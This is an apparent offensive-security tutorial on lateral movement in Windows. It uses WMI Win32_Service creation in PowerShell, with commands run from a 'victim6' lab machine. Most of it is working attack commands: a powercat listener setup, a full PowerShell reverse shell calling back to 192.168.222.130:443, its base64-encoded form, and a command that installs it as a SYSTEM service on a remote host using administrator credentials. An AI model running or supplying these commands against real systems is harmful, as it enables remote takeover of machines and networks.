Lateral Movement Command Execution Win32_service

PS C:\Users\victim6\Downloads> (Get-CimClass -classname win32_service).cimclassmethods

Create a service:

PS C:\Users\victim6\Downloads> $servicetype = [byte] 16

PS C:\Users\victim6\Downloads> $ErrorControl = [byte] 1

PS C:\Users\victim6\Downloads> Invoke-WmiMethod -Class win32_service -name create -argumentlist $false, “Windows performance”,$errorcontrol, $null, $null,”WinPerf”,”C:\Windows\Syetm32\calc.exe”, $null, $servicetype, “Manual”, “NT Authority\system”, ” “

PS C:\Users\victim6\Downloads> Get-WmiObject -class win32_service -filter ‘name = “WinPerf”‘

Start the service:

PS C:\Users\victim6\Downloads> Get-WmiObject -class win32_service -filter ‘name = “WinPerf”‘ | Invoke-WmiMethod -name startservice

Remove The service:

PS C:\Users\victim6\Downloads> Get-WmiObject -class win32_service -filter ‘name = “WinPerf”‘  | Remove-wmiobject

On another PS shell:

PS C:\Users\victim6\Downloads\new\new\tool\tool\powercat-master\powercat-master> Set-ExecutionPolicy RemoteSigned

PS C:\Users\victim6\Downloads\new\new\tool\tool\powercat-master\powercat-master> . .\powercat.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\powercat-master\powercat-master> powercat -l -v -p 443 -t 1000

Abusing service creation:

Reverse shell :

$client = New-Object System.Net.Sockets.TCPClient(“192.168.222.130”,443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + “PS ” + (pwd).Path + “> “;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Enoded reversehell value:

JGNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5Tb2NrZXRzLlRDUENsaWVudCgiMTkyLjE2OC4yMjIuMTMwIiw0NDMpOyRzdHJlYW0gPSAkY2xpZW50LkdldFN0cmVhbSgpO1tieXRlW11dJGJ5dGVzID0gMC4uNjU1MzV8JXswfTt3aGlsZSgoJGkgPSAkc3RyZWFtLlJlYWQoJGJ5dGVzLCAwLCAkYnl0ZXMuTGVuZ3RoKSkgLW5lIDApezskZGF0YSA9IChOZXctT2JqZWN0IC1UeXBlTmFtZSBTeXN0ZW0uVGV4dC5BU0NJSUVuY29kaW5nKS5HZXRTdHJpbmcoJGJ5dGVzLDAsICRpKTskc2VuZGJhY2sgPSAoaWV4ICRkYXRhIDI+JjEgfCBPdXQtU3RyaW5nICk7JHNlbmRiYWNrMiA9ICRzZW5kYmFjayArICJQUyAiICsgKHB3ZCkuUGF0aCArICI+ICI7JHNlbmRieXRlID0gKFt0ZXh0LmVuY29kaW5nXTo6QVNDSUkpLkdldEJ5dGVzKCRzZW5kYmFjazIpOyRzdHJlYW0uV3JpdGUoJHNlbmRieXRlLDAsJHNlbmRieXRlLkxlbmd0aCk7JHN0cmVhbS5GbHVzaCgpfTskY2xpZW50LkNsb3NlKCk=

PS C:\Users\victim6\Downloads> Invoke-WmiMethod -class win32_service -name create -ArgumentList $false, “windows performance”, $errorcontrol, $null,$null,”WinPerf”,”c:\windows\system32\cmd.exe  /c powershell -e JGNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5Tb2NrZXRzLlRDUENsaWVudCgiMTkyLjE2OC4yMjIuMTMwIiw0NDMpOyRzdHJlYW0gPSAkY2xpZW50LkdldFN0cmVhbSgpO1tieXRlW11dJGJ5dGVzID0gMC4uNjU1MzV8JXswfTt3aGlsZSgoJGkgPSAkc3RyZWFtLlJlYWQoJGJ5dGVzLCAwLCAkYnl0ZXMuTGVuZ3RoKSkgLW5lIDApezskZGF0YSA9IChOZXctT2JqZWN0IC1UeXBlTmFtZSBTeXN0ZW0uVGV4dC5BU0NJSUVuY29kaW5nKS5HZXRTdHJpbmcoJGJ5dGVzLDAsICRpKTskc2VuZGJhY2sgPSAoaWV4ICRkYXRhIDI+JjEgfCBPdXQtU3RyaW5nICk7JHNlbmRiYWNrMiA9ICRzZW5kYmFjayArICJQUyAiICsgKHB3ZCkuUGF0aCArICI+ICI7JHNlbmRieXRlID0gKFt0ZXh0LmVuY29kaW5nXTo6QVNDSUkpLkdldEJ5dGVzKCRzZW5kYmFjazIpOyRzdHJlYW0uV3JpdGUoJHNlbmRieXRlLDAsJHNlbmRieXRlLkxlbmd0aCk7JHN0cmVhbS5GbHVzaCgpfTskY2xpZW50LkNsb3NlKCk=”,$null,$servicetype,”manual”,”nt authority\system”,”” -computername 192.168.222.144 -credential SECURITY\administrator

PS C:\Users\victim6\Downloads> Get-WmiObject -Class win32_service -Filter ‘name = “WinPerf”‘ -ComputerName 192.168.222.144 | invoke-wmimethod -name startservice

And by this way we get the shell at listener end.

@Saksham Dixit